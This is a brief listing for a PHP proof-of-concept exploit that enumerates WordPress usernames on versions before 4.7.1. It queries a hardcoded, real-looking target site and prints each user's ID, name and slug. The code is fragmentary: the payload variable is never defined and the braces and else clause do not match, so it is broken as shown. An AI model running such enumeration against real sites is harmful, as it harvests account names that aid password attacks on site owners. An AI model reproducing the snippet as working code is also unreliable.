WordPress Username Enumeration

Simple PHP proof of concept exploit that demonstrates username enumeration in WordPress versions prior to 4.7.1.

header ('Content-type: text/html; charset=UTF-8');

$url= "https://bucaneiras.org/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}


